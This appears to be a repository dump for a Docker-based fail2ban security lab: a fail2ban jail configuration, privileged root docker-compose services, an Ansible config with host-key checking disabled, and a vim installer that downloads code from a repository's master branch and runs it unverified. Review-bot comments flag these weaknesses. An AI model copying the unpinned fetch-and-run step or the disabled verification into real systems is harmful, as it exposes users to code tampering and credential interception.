# Format of user-agent https://tools.ietf.org/html/rfc7231#section-5.5.3
fail2ban_agent = Fail2Ban/%(fail2ban_version)s
#
# Action shortcuts. To be used to define action parameter
# Default banning action (e.g. iptables, iptables-new,
# iptables-multiport, shorewall, etc) It is used to define
# action_* variables. Can be overridden globally or per
# section within jail.local file
banaction = iptables-multiport
banaction_allports = iptables-allports
# The simplest action to take: ban only
#action_ = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
# ban & send an e-mail with whois report to the destemail.
action_mw = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
%(mta)s-whois[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", protocol="%(protocol)s", chain="%(chain)s"]
# ban & send an e-mail with whois report and relevant log lines
# to the destemail.
action_mwl = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
%(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"]
# See the IMPORTANT note in action.d/xarf-login-attack for when to use this action
#
# ban & send a xarf e-mail to abuse contact of IP address and include relevant log lines
# to the destemail.
action_xarf = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
xarf-login-attack[service=%(__name__)s, sender="%(sender)s", logpath=%(logpath)s, port="%(port)s"]
# ban IP on CloudFlare & send an e-mail with whois report and relevant log lines
# to the destemail.
action_cf_mwl = cloudflare[cfuser="%(cfemail)s", cftoken="%(cfapikey)s"]
%(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"]
# Report block via blocklist.de fail2ban reporting service API
#
# See the IMPORTANT note in action.d/blocklist_de.conf for when to use this action.
# Specify expected parameters in file action.d/blocklist_de.local or if the interpolation
# `action_blocklist_de` used for the action, set value of `blocklist_de_apikey`
# in your `jail.local` globally (section [DEFAULT]) or per specific jail section (resp. in
# corresponding jail.d/my-jail.local file).
#
action_blocklist_de = blocklist_de[email="%(sender)s", service=%(filter)s, apikey="%(blocklist_de_apikey)s", agent="%(fail2ban_agent)s"]
# Report ban via badips.com, and use as blacklist
#
# See BadIPsAction docstring in config/action.d/badips.py for
# documentation for this action.
#
# NOTE: This action relies on banaction being present on start and therefore
# should be last action defined for a jail.
#
action_badips = badips.py[category="%(__name__)s", banaction="%(banaction)s", agent="%(fail2ban_agent)s"]
#
# Report ban via badips.com (uses action.d/badips.conf for reporting only)
#
action_badips_report = badips[category="%(__name__)s", agent="%(fail2ban_agent)s"]
# Report ban via abuseipdb.com.
#
# See action.d/abuseipdb.conf for usage example and details.
#
action_abuseipdb = abuseipdb
# Choose default action. To change, just override value of 'action' with the
# interpolation to the chosen action shortcut (e.g. action_mw, action_mwl, etc) in jail.local
# globally (section [DEFAULT]) or per specific section
action = %(action_)s
#
# JAILS
#
#
# SSH servers
#
[sshd]
enabled = true
maxretry = 3
bantime = 300
findtime = 30
# To use more aggressive sshd modes set filter parameter "mode" in jail.local:
# normal (default), ddos, extra or aggressive (combines all).
# See "tests/files/logs/sshd" or "filter.d/sshd.conf" for usage example and details.
#mode = normal
chain= INPUT
port = 22
logpath = %(sshd_log)s
backend = %(sshd_backend)s
action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
[dropbear]
port = ssh
logpath = %(dropbear_log)s
backend = %(dropbear_backend)s
[selinux-ssh]
port = ssh
logpath = %(auditd_log)s
enabled = true
#
# HTTP servers
#
[apache-auth]
port = http,https
logpath = %(apache_error_log)s
[apache-badbots]
# Ban hosts which agent identifies spammer robots crawling the web
# for email addresses. The mail outputs are buffered.
port = http,https
logpath = %(apache_access_log)s
bantime = 48h
maxretry = 1
[apache-noscript]
port = http,https
logpath = %(apache_error_log)s
[apache-overflows]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-nohome]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-botsearch]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-fakegooglebot]
port = http,https
logpath = %(apache_access_log)s
maxretry = 1
ignorecommand = %(ignorecommands_dir)s/apache-fakegooglebot <ip>
[apache-modsecurity]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-shellshock]
port = http,https
logpath = %(apache_error_log)s
maxretry = 1
[openhab-auth]
filter = openhab
action = iptables-allports[name=NoAuthFailures]
logpath = /opt/openhab/logs/request.log
[nginx-http-auth]
port = http,https
logpath = %(nginx_error_log)s
# To use 'nginx-limit-req' jail you should have `ngx_http_limit_req_module`
# and define `limit_req` and `limit_req_zone` as described in nginx documentation
# http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
# or for example see in 'config/filter.d/nginx-limit-req.conf'
[nginx-limit-req]
port = http,https
logpath = %(nginx_error_log)s
[nginx-botsearch]
port = http,https
logpath = %(nginx_error_log)s
maxretry = 2
# Ban attackers that try to use PHP's URL-fopen() functionality
# through GET/POST variables. - Experimental, with more than a year
# of usage in production environments.
[php-url-fopen]
port = http,https
logpath = %(nginx_access_log)s
%(apache_access_log)s
[suhosin]
port = http,https
logpath = %(suhosin_log)s
[lighttpd-auth]
# Same as above for Apache's mod_auth
# It catches wrong authentifications
port = http,https
logpath = %(lighttpd_error_log)s
#
# Webmail and groupware servers
#
[roundcube-auth]
port = http,https
logpath = %(roundcube_errors_log)s
# Use following line in your jail.local if roundcube logs to journal.
#backend = %(syslog_backend)s
[openwebmail]
port = http,https
logpath = /var/log/openwebmail.log
[horde]
port = http,https
logpath = /var/log/horde/horde.log
[groupoffice]
port = http,https
logpath = /home/groupoffice/log/info.log
[sogo-auth]
# Monitor SOGo groupware server
# without proxy this would be:
# port = 20000
port = http,https
logpath = /var/log/sogo/sogo.log
[tine20]
logpath = /var/log/tine20/tine20.log
port = http,https
#
# Web Applications
#
#
[drupal-auth]
port = http,https
logpath = %(syslog_daemon)s
backend = %(syslog_backend)s
[guacamole]
port = http,https
logpath = /var/log/tomcat*/catalina.out
[monit]
#Ban clients brute-forcing the monit gui login
port = 2812
logpath = /var/log/monit
[webmin-auth]
port = 10000
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
[froxlor-auth]
port = http,https
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
#
# HTTP Proxy servers
#
#
[squid]
port = 80,443,3128,8080
logpath = /var/log/squid/access.log
[3proxy]
port = 3128
logpath = /var/log/3proxy.log
#
# FTP servers
#
[proftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(proftpd_log)s
backend = %(proftpd_backend)s
[pure-ftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(pureftpd_log)s
backend = %(pureftpd_backend)s
[gssftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(syslog_daemon)s
backend = %(syslog_backend)s
[wuftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(wuftpd_log)s
backend = %(wuftpd_backend)s
[vsftpd]
# or overwrite it in jails.local to be
# logpath = %(syslog_authpriv)s
# if you want to rely on PAM failed login attempts
# vsftpd's failregex should match both of those formats
port = ftp,ftp-data,ftps,ftps-data
logpath = %(vsftpd_log)s
#
# Mail servers
#
# ASSP SMTP Proxy Jail
[assp]
port = smtp,465,submission
logpath = /root/path/to/assp/logs/maillog.txt
[courier-smtp]
port = smtp,465,submission
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[postfix]
# To use another modes set filter parameter "mode" in jail.local:
mode = more
port = smtp,465,submission
logpath = %(postfix_log)s
backend = %(postfix_backend)s
[postfix-rbl]
filter = postfix[mode=rbl]
port = smtp,465,submission
logpath = %(postfix_log)s
backend = %(postfix_backend)s
maxretry = 1
[sendmail-auth]
port = submission,465,smtp
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[sendmail-reject]
# To use more aggressive modes set filter parameter "mode" in jail.local:
# normal (default), extra or aggressive
# See "tests/files/logs/sendmail-reject" or "filter.d/sendmail-reject.conf" for usage example and details.
#mode = normal
port = smtp,465,submission
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[qmail-rbl]
filter = qmail
port = smtp,465,submission
logpath = /service/qmail/log/main/current
# dovecot defaults to logging to the mail syslog facility
# but can be set by syslog_facility in the dovecot configuration.
[dovecot]
port = pop3,pop3s,imap,imaps,submission,465,sieve
logpath = %(dovecot_log)s
backend = %(dovecot_backend)s
[sieve]
port = smtp,465,submission
logpath = %(dovecot_log)s
backend = %(dovecot_backend)s
[solid-pop3d]
port = pop3,pop3s
logpath = %(solidpop3d_log)s
[exim]
# see filter.d/exim.conf for further modes supported from filter:
#mode = normal
port = smtp,465,submission
logpath = %(exim_main_log)s
[exim-spam]
port = smtp,465,submission
logpath = %(exim_main_log)s
[kerio]
port = imap,smtp,imaps,465
logpath = /opt/kerio/mailserver/store/logs/security.log
#
# Mail servers authenticators: might be used for smtp,ftp,imap servers, so
# all relevant ports get banned
#
[courier-auth]
port = smtp,465,submission,imap,imaps,pop3,pop3s
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[postfix-sasl]
filter = postfix[mode=auth]
port = smtp,465,submission,imap,imaps,pop3,pop3s
# You might consider monitoring /var/log/mail.warn instead if you are
# running postfix since it would provide the same log lines at the
# "warn" level but overall at the smaller filesize.
logpath = %(postfix_log)s
backend = %(postfix_backend)s
[perdition]
port = imap,imaps,pop3,pop3s
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[squirrelmail]
port = smtp,465,submission,imap,imap2,imaps,pop3,pop3s,http,https,socks
logpath = /var/lib/squirrelmail/prefs/squirrelmail_access_log
[cyrus-imap]
port = imap,imaps
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[uwimap-auth]
port = imap,imaps
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
#
#
# DNS servers
#
# !!! WARNING !!!
# Since UDP is connection-less protocol, spoofing of IP and imitation
# of illegal actions is way too simple. Thus enabling of this filter
# might provide an easy way for implementing a DoS against a chosen
# victim. See
# http://nion.modprobe.de/blog/archives/690-fail2ban-+-dns-fail.html
# Please DO NOT USE this jail unless you know what you are doing.
#
# IMPORTANT: see filter.d/named-refused for instructions to enable logging
# This jail blocks UDP traffic for DNS requests.
# [named-refused-udp]
#
# filter = named-refused
# port = domain,953
# protocol = udp
# logpath = /var/log/named/security.log
# IMPORTANT: see filter.d/named-refused for instructions to enable logging
# This jail blocks TCP traffic for DNS requests.
[named-refused]
port = domain,953
logpath = /var/log/named/security.log
[nsd]
port = 53
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
logpath = /var/log/nsd.log
#
# Miscellaneous
#
[asterisk]
port = 5060,5061
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
%(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"]
logpath = /var/log/asterisk/messages
maxretry = 10
[freeswitch]
port = 5060,5061
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
%(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"]
logpath = /var/log/freeswitch.log
maxretry = 10
# To log wrong MySQL access attempts add to /etc/my.cnf in [mysqld] or
# equivalent section:
# log-warning = 2
#
# for syslog (daemon facility)
# [mysqld_safe]
# syslog
#
# for own logfile
# [mysqld]
# log-error=/var/log/mysqld.log
[mysqld-auth]
port = 3306
logpath = %(mysql_log)s
backend = %(mysql_backend)s
# Log wrong MongoDB auth (for details see filter 'filter.d/mongodb-auth.conf')
[mongodb-auth]
# change port when running with "--shardsvr" or "--configsvr" runtime operation
port = 27017
logpath = /var/log/mongodb/mongodb.log
# Jail for more extended banning of persistent abusers
# !!! WARNINGS !!!
# 1. Make sure that your loglevel specified in fail2ban.conf/.local
# is not at DEBUG level -- which might then cause fail2ban to fall into
# an infinite loop constantly feeding itself with non-informative lines
# 2. Increase dbpurgeage defined in fail2ban.conf to e.g. 648000 (7.5 days)
# to maintain entries for failed logins for sufficient amount of time
[recidive]
logpath = /var/log/fail2ban.log
banaction = %(banaction_allports)s
bantime = 1w
findtime = 1d
# Generic filter for PAM. Has to be used with action which bans all
# ports such as iptables-allports, shorewall
[pam-generic]
# pam-generic filter can be customized to monitor specific subset of 'tty's
banaction = %(banaction_allports)s
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
[xinetd-fail]
banaction = iptables-multiport-log
logpath = %(syslog_daemon)s
backend = %(syslog_backend)s
maxretry = 2
# stunnel - need to set port for this
[stunnel]
logpath = /var/log/stunnel4/stunnel.log
[ejabberd-auth]
port = 5222
logpath = /var/log/ejabberd/ejabberd.log
[counter-strike]
logpath = /opt/cstrike/logs/L[0-9]*.log
# Firewall: http://www.cstrike-planet.com/faq/6
tcpport = 27030,27031,27032,27033,27034,27035,27036,27037,27038,27039
udpport = 1200,27000,27001,27002,27003,27004,27005,27006,27007,27008,27009,27010,27011,27012,27013,27014,27015
action = %(banaction)s[name=%(__name__)s-tcp, port="%(tcpport)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(udpport)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
# consider low maxretry and a long bantime
# nobody except your own Nagios server should ever probe nrpe
[nagios]
logpath = %(syslog_daemon)s ; nrpe.cfg may define a different log_facility
backend = %(syslog_backend)s
maxretry = 1
[oracleims]
# see "oracleims" filter file for configuration requirement for Oracle IMS v6 and above
logpath = /opt/sun/comms/messaging64/log/mail.log_current
banaction = %(banaction_allports)s
[directadmin]
logpath = /var/log/directadmin/login.log
port = 2222
[portsentry]
logpath = /var/lib/portsentry/portsentry.history
maxretry = 1
[pass2allow-ftp]
# this pass2allow example allows FTP traffic after successful HTTP authentication
port = ftp,ftp-data,ftps,ftps-data
# knocking_url variable must be overridden to some secret value in jail.local
knocking_url = /knocking/
filter = apache-pass[knocking_url="%(knocking_url)s"]
# access log of the website with HTTP auth
logpath = %(apache_access_log)s
blocktype = RETURN
returntype = DROP
action = %(action_)s[blocktype=%(blocktype)s, returntype=%(returntype)s]
bantime = 1h
maxretry = 1
findtime = 1
[murmur]
# AKA mumble-server
port = 64738
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol=tcp, chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol=udp, chain="%(chain)s", actname=%(banaction)s-udp]
logpath = /var/log/mumble-server/mumble-server.log
[screensharingd]
# For Mac OS Screen Sharing Service (VNC)
logpath = /var/log/system.log
logencoding = utf-8
[haproxy-http-auth]
# HAProxy by default doesn't log to file you'll need to set it up to forward
# logs to a syslog server which would then write them to disk.
# See "haproxy-http-auth" filter for a brief cautionary note when setting
# maxretry and findtime.
logpath = /var/log/haproxy.log
[slapd]
port = ldap,ldaps
logpath = /var/log/slapd.log
[domino-smtp]
port = smtp,ssmtp
logpath = /home/domino01/data/IBM_TECHNICAL_SUPPORT/console.log
[phpmyadmin-syslog]
port = http,https
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
[zoneminder]
# Zoneminder HTTP/HTTPS web interface auth
# Logs auth failures to apache2 error log
port = http,https
logpath = %(apache_error_log)s

37
docker-compose.yml

@ -0,0 +1,37 @@
version: "2"
services:
registry:
image: registry
ports:
- "5000:5000"
master:
image: localhost:5000/sec
privileged: true
cap_add:
- NET_ADMIN
user: root
entrypoint: ["sec_bootstrap", "role=master", "sec_master_service_name=master", "sec_worker_service_name=worker"]
ports:
- "2222:22"
networks:
- net
volumes:
- /home/zoiros13/swarmlab-sec/test/project:/project
worker:
image: localhost:5000/sec
privileged: true
cap_add:
- NET_ADMIN
user: root
entrypoint: ["sec_bootstrap", "role=worker", "sec_master_service_name=master", "sec_worker_service_name=worker"]
networks:
- net
volumes:
- /home/zoiros13/swarmlab-sec/test/project:/project
networks:
net:
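Review bot: Both `master` and `worker` run with `privileged: true`, `user: root` and a host bind mount, which hands the lab containers full control of the host kernel and network stack, and the `cap_add: NET_ADMIN` entries are redundant once `privileged` is set. The image itself drops to `USER docker` (its inspect output in out.log shows `"User": "docker"`), so `user: root` deliberately undoes the image's own least-privilege choice. If the only root work is fail2ban/iptables inside the container, removing `privileged: true` and keeping `cap_add: [NET_ADMIN, NET_RAW]` is the least-privilege shape — whether `sec_bootstrap` needs more than that is not visible here. `image: registry` and `localhost:5000/sec` are untagged, so neither the registry nor the lab image is pinned; use a `registry:2.x` tag and a `sec:<version>` tag. The bind-mount path `/home/zoiros13/swarmlab-sec/test/project` is specific to one workstation; `./project` would make the file portable.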

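--- a/get_hosts
+++ b/get_hosts
@@ -0,0 +1,8 @@
+#!/bin/sh
+# Include the variables that store the Docker service names
+# shellcheck disable=SC1091
+. /etc/opt/service_names
+( netstat -t | grep ESTABLISHED | awk '{print $5}' | grep "$MPI_WORKER_SERVICE_NAME" | cut -d: -f1 \
+& getent hosts "$MPI_MASTER_SERVICE_NAME" | cut -d' ' -f1 ) | sort -u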
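Review bot: The worker list is derived from whichever TCP connections happen to be ESTABLISHED at the instant the script runs, so an idle worker is silently omitted, and `netstat -t` without `-n` additionally depends on reverse DNS resolving the peer to a name that contains `$MPI_WORKER_SERVICE_NAME`. If that variable is unset, `grep ""` matches every connection, so add `set -u` right after the `.` line so a missing service name fails loudly. The sourced names are `MPI_*` while docker-compose.yml passes `sec_master_service_name`/`sec_worker_service_name` to `sec_bootstrap`; presumably the bootstrap writes `/etc/opt/service_names` with the MPI_ names, but that is worth confirming. A header comment would help: `# Prints one IP per line: the master (via DNS) plus every worker currently connected over TCP.`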

74
install-vim-plugin.sh

@ -0,0 +1,74 @@
#! /usr/bin/env sh
start_dir=$(pwd)
bin_string="export PATH=\"${PATH}:${HOME}/.vimpkg/bin\""
# Download the apt-vim files
curl -fSsLo ${HOME}/apt-vim/apt-vim --create-dirs \
https://raw.githubusercontent.com/egalpin/apt-vim/master/apt-vim
curl -fSsLo ${HOME}/apt-vim/vim_config.json \
https://raw.githubusercontent.com/egalpin/apt-vim/master/vim_config.json
# Add vimrc if there isn't one already
[ -f ${HOME}/.vimrc ] || touch ${HOME}/.vimrc
# Make sure vimrc is using pathogen
if [ $(grep -c "execute pathogen#infect()" ${HOME}/.vimrc) -eq 0 ]; then
echo "execute pathogen#infect()" >> ${HOME}/.vimrc
fi
if [ $(grep -c "call pathogen#helptags()" ${HOME}/.vimrc) -eq 0 ]; then
echo "call pathogen#helptags()" >> ${HOME}/.vimrc
fi
# Update path for executing shell
eval "$bin_string"
added_to_profile=false
already_present=false
for rc in bashrc zshrc bash_profile; do
if [ -s "$HOME/.$rc" ]; then
if grep -q "$bin_string" "$HOME/.$rc"; then
already_present=true
else
printf "\n$bin_string\n" >> "$HOME/.$rc"
printf "== Added apt-vim PATH to '~/.$rc'\n"
added_to_profile=true
fi
fi
done
# Execute apt-vim init
cd ${HOME}/apt-vim
python - <<EOF
import imp, os
print('apt-vim setup starting')
HOME = os.path.expanduser("~")
APT_VIM_DIR = os.path.abspath(os.path.join(HOME, 'apt-vim'))
SCRIPT_ROOT_DIR = os.path.abspath(os.path.join(HOME, '.vimpkg'))
BIN_DIR = os.path.abspath(os.path.join(SCRIPT_ROOT_DIR, 'bin'))
os.environ['PATH'] += os.pathsep + BIN_DIR
os.chdir(APT_VIM_DIR)
aptvim = imp.load_source("aptvim", "./apt-vim")
av = aptvim.aptvim(ASSUME_YES=True, VIM_CONFIG='', INSTALL_TARGET='')
av.first_run()
av.handle_install(None, None, None)
EOF
python_result=$?
cd $start_dir
echo
if [ "$python_result" -ne 0 ]; then
echo "== Error:"
echo " Installation failed."
elif [ "$added_to_profile" = false ] && [ "$already_present" = false ]; then
echo "== Error:"
echo " Found no profile to add apt-vim PATH to."
echo " Add the following line to your shell profile and source it to install manually:"
printf " $bin_string\n"
else
echo "== apt-vim installation succeeded! Run 'source ~/.bashrc || source ~/.bash_profile' or 'source ~/.zshrc'"
echo " to access the executable script."
fi
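Review bot: The script fetches `apt-vim` and `vim_config.json` from the `master` branch of a third-party GitHub repository and then executes the downloaded file through `imp.load_source`, with no pinned revision and no checksum, so whatever is on that branch at install time runs with the invoking user's privileges. Pin both URLs to a commit hash instead of `master` and verify before loading, e.g. `echo "<sha256>  ${HOME}/apt-vim/apt-vim" | sha256sum -c -` between the `curl` calls and the `python` heredoc. The `imp` module used in the heredoc was removed in Python 3.12, so the installer will stop working on current interpreters; `importlib.util.spec_from_file_location` is the replacement. If this is a vendored copy of the upstream installer, a header comment naming its origin and version would make that clear to the next reader.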

108
out.log

@ -0,0 +1,108 @@
[
{
"Id": "sha256:0041eaed21a5682cff858aee77ed2ea8c36c35cce0379f98e6a00d0ffef32a7f",
"RepoTags": [
"localhost:5000/sec:latest"
],
"RepoDigests": [
"localhost:5000/sec@sha256:f13d2efea610e1b5e8a4c7340be199975f7d0dc76a232806e908bb2d7851b536"
],
"Parent": "sha256:3c45feb440ff524a3e4f2265d5024e6b9050bea85e9ab2121abdbb06ee174799",
"Comment": "",
"Created": "2021-01-20T20:32:11.522588405Z",
"Container": "ec9a751f11f0c2b16c6c6f2640b1c6bdc9f60731dd9b2a0dc535330513882733",
"ContainerConfig": {
"Hostname": "ec9a751f11f0",
"Domainname": "",
"User": "docker",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"NOTVISIBLE=in users profile"
],
"Cmd": [
"/bin/sh",
"-c",
"#(nop) ",
"USER docker"
],
"Image": "sha256:3c45feb440ff524a3e4f2265d5024e6b9050bea85e9ab2121abdbb06ee174799",
"Volumes": null,
"WorkingDir": "/project",
"Entrypoint": null,
"OnBuild": null,
"Labels": {}
},
"DockerVersion": "20.10.2",
"Author": "",
"Config": {
"Hostname": "",
"Domainname": "",
"User": "docker",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"NOTVISIBLE=in users profile"
],
"Cmd": [
"/bin/bash"
],
"Image": "sha256:3c45feb440ff524a3e4f2265d5024e6b9050bea85e9ab2121abdbb06ee174799",
"Volumes": null,
"WorkingDir": "/project",
"Entrypoint": null,
"OnBuild": null,
"Labels": null
},
"Architecture": "amd64",
"Os": "linux",
"Size": 305502675,
"VirtualSize": 305502675,
"GraphDriver": {
"Data": {
"LowerDir": "/var/lib/docker/overlay2/4f892c1ac39fc2cb2c12671d034ef86c890fb69a25f93111e51cfec60a896bc1/diff:/var/lib/docker/overlay2/0222bce3cfcd94fb28b763949c93d014ef8cb2ce7563059b2a20185028b6c4f3/diff:/var/lib/docker/overlay2/4061c57597e713442d54694880a0db84f21b84dc27a83cf14b1a2ea8f80adb57/diff:/var/lib/docker/overlay2/ad0740f4bddaa797f65b9b610bb997383e100f6b11b6e31abfe97a56d73e02a6/diff:/var/lib/docker/overlay2/9f718fd300ccb6ccb4c4993d1e2c08479975a2680f73137c4c2a00675e34dad8/diff:/var/lib/docker/overlay2/36e34aaf6d9ff64abd4c0ae243a7171a6f36f98ec1d8015fd2e52121c61c9388/diff:/var/lib/docker/overlay2/e453e8ba3d5a70996395e475debf7e263dec58550b0f1ab08040f7cffe38a8ed/diff:/var/lib/docker/overlay2/09cbcb578a8d6eb1608796982a8de961456201784d1c4ed1a883c391793da8c4/diff:/var/lib/docker/overlay2/f1ac5b915d3a2ff4c84e6f2fe508ce65dc00b17857abaca3191d98f61b985d76/diff:/var/lib/docker/overlay2/314db0ab7f769d13ef33021169644fd1775852bf27998457ea00256c75adac79/diff:/var/lib/docker/overlay2/7a9f4160461f58a5e631eb9a1f37bf2e2e4077dd18ece01edda94aefec7d513f/diff:/var/lib/docker/overlay2/c2ba9675d35ea38b3e2030a6328afc1375813586d15456e48700224a197af10e/diff:/var/lib/docker/overlay2/6041b67add52b7f6a9f85856676306c785620be38024f5b526aa2e57c5bb94cb/diff:/var/lib/docker/overlay2/30ead6ae4469b85cb7c638e7ac62e00d67cbe93dfd997224403bcba8d69b7ba6/diff:/var/lib/docker/overlay2/d471ee8da4cfca625a09d36962bf37a3817ef988a3120207170381a3cc2f49ff/diff:/var/lib/docker/overlay2/943b7349849e2f834a9d5ad37740f06517a252b3e6268a0763fc1ee15bf4ba17/diff:/var/lib/docker/overlay2/4bca1529a9b65355dc3508268159aee6e2416896cb335bec235d8c8699984d3e/diff:/var/lib/docker/overlay2/d18ba52d5410e31e13be1d13fa2f879c383fd4605b74b9e7579321d724de2704/diff",
"MergedDir": "/var/lib/docker/overlay2/17569aed539925cda12d1788c2d33a78d657f25922e48c0e4dc1005a83a13d0a/merged",
"UpperDir": "/var/lib/docker/overlay2/17569aed539925cda12d1788c2d33a78d657f25922e48c0e4dc1005a83a13d0a/diff",
"WorkDir": "/var/lib/docker/overlay2/17569aed539925cda12d1788c2d33a78d657f25922e48c0e4dc1005a83a13d0a/work"
},
"Name": "overlay2"
},
"RootFS": {
"Type": "layers",
"Layers": [
"sha256:b43408d5f11b7b2faf048ae4eb25c296536c571fb2f937b4f1c3883386e93d64",
"sha256:23135df75b44a66efa9d8dc1a10051768c27bd95388f436eb9553e0eb17211f6",
"sha256:fe6d8881187d429af3f636c574911690455825998c9f366e985eab646665e711",
"sha256:995775ccb2c94c617a372f5a07fe9e85ce422976342a63faf5f81d4e554d33e8",
"sha256:513860d9d8b4c2b418330f754ee9f2a4ae7d0a08f8cc7e09a59e2d8a1f76082d",
"sha256:05d45691094f911e1b03b522b2413f697990fca5d00d2a36681f8252bac30f70",
"sha256:00e25a02cb66855e8c694a62b7a484ff94c6a7a22ff3b7ad77e46465f772ddda",
"sha256:a7a46ea008ba01f492e17cea196b012005cea47943121f07a7ca93e93fbfbfad",
"sha256:170701127bf7609d55d9839ddcfa21759e2b8ccf6c0a6881992314eb15833969",
"sha256:6ffbdb2e142b68e05e145a71776d68d04b4829c8c6ce1601d27f3ff4be775474",
"sha256:b1f3cd54cc350f0710b04c61fa57a0c4906f3671940021313e6e6064c4072247",
"sha256:13318292ad09178d2082cf8d21a96b412f374964202a340c701db1c1c4064263",
"sha256:e9c7b4c198ead49bd465541674eea08c223b465e3ba2d113bff3450cf59943a2",
"sha256:841f3d71c84f6ec64a8af1d647782a73be2320e79386890e7c9c243aa98d41ba",
"sha256:f9c45f1c0ac098e81dfa7aaaa24ddf5667d0141f6f4150af47e607483fbdd0de",
"sha256:f14dbf3fe313e8c4899fb1a9da6d40befca490aacd3dd61a1a9da519aec27cb6",
"sha256:f9a062359efaf04a7b4f8204fe3a640197c8cb0049584f463a0d78c95dfd6fc3",
"sha256:38af96194c0c78613d6406f1ac89611fca867e8318919469d1e4ef831eb7107c",
"sha256:1dca0d6457411690de65496d90b642cb2ad6eaea65a26c7c9c87f59dea1c14f4"
]
},
"Metadata": {
"LastTagTime": "2021-01-20T22:32:11.567491531+02:00"
}
}
]

5275
passwd_list

File diff suppressed because it is too large

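--- a/project/ansible_cfg_text
+++ b/project/ansible_cfg_text
@@ -0,0 +1,35 @@
+# config file for ansible -- https://ansible.com/
+# ===============================================
+# nearly all parameters can be overridden in ansible-playbook
+# or with command line flags. ansible will read ANSIBLE_CONFIG,
+# ansible.cfg in the current working directory, .ansible.cfg in
+# the home directory or /etc/ansible/ansible.cfg, whichever it
+# finds first
+[defaults]
+host_key_checking = False
+# some basic default values...
+#inventory = /etc/ansible/hosts
+#library = /usr/share/my_modules/
+#module_utils = /usr/share/my_module_utils/
+#remote_tmp = ~/.ansible/tmp
+#local_tmp = ~/.ansible/tmp
+#plugin_filters_cfg = /etc/ansible/plugin_filters.yml
+#forks = 5
+#poll_interval = 15
+#sudo_user = root
+#ask_sudo_pass = True
+#ask_pass = True
+#transport = smart
+#remote_port = 22
+#module_lang = C
+#module_set_locale = False
+# plays will gather facts by default, which contain information about
+# the remote system.
+#
+# smart - gather by default, but don't regather if already gathered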
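Review bot: `host_key_checking = False` under `[defaults]` switches off SSH host-key verification for every play that picks up this config, and because the wrapper scripts connect with `--ask-pass`, a host impersonating a lab container would receive the password in the clear. For a throwaway Docker lab that may be acceptable, but it should be stated and scoped right above the setting: `# Lab only: containers get fresh host keys on every start, so known_hosts cannot be pre-seeded. Never reuse this config outside the isolated swarm network.` The alternative that keeps verification on is to run `ssh-keyscan` over the inventory hosts into a lab-specific known_hosts before the first play. The file also ends mid-comment (`# smart - gather by default…`), so it reads as a truncated copy of the stock ansible.cfg rather than a purpose-written config; trimming it to the `[defaults]` section it actually sets would make that intent clear.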

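--- a/project/ansible_fail2ban.sh
+++ b/project/ansible_fail2ban.sh
@@ -0,0 +1,2 @@
+ansible-playbook -u docker -i inventory.yml test_fail2ban.yml -f 5 --ask-pass --ask-become-pass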
